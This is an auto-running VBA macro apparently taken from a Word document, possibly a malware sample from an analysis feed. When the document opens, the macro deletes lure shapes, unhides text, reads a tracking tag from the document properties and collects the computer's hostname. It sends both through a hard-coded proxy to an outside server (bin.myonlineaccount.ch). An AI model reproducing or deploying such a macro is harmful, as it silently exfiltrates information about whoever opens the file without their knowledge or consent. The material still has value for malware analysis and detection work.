Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub init()

    If Application.Documents.Count >= 1 Then
        With Application.Documents(1)
            For Each Shp In .Shapes
                Shp.Anchor.Font.Hidden = False
            Next
        End With
    End If

End Sub


Private Sub Document_Open()

    If Application.Documents.Count >= 1 Then
         Application.Documents(1).Shapes(1).Delete
         Application.Documents(1).Shapes(1).Delete

        Dim xmlhttp As Object
        
        t = Application.Documents(1).BuiltInDocumentProperties("Comments")

        If t <> "" Then
            Debug.Print "Tag: " & t
            hostName = Environ$("computername")
            Debug.Print "Hostname: " & hostName
            
            Set xmlhttp = CreateObject("Msxml2.ServerXMLHTTP.6.0")
            xmlhttp.setProxy 2, "proxy-bc2.vd.ch:8080", ""

            diag_url = "https://bin.myonlineaccount.ch/data.php?t=" + t + "&d=" + hostName
            xmlhttp.Open "GET", diag_url, False
            xmlhttp.Send
        
        End If
        
    End If
    
    
    
    
End Sub


INQUEST-PP=macro
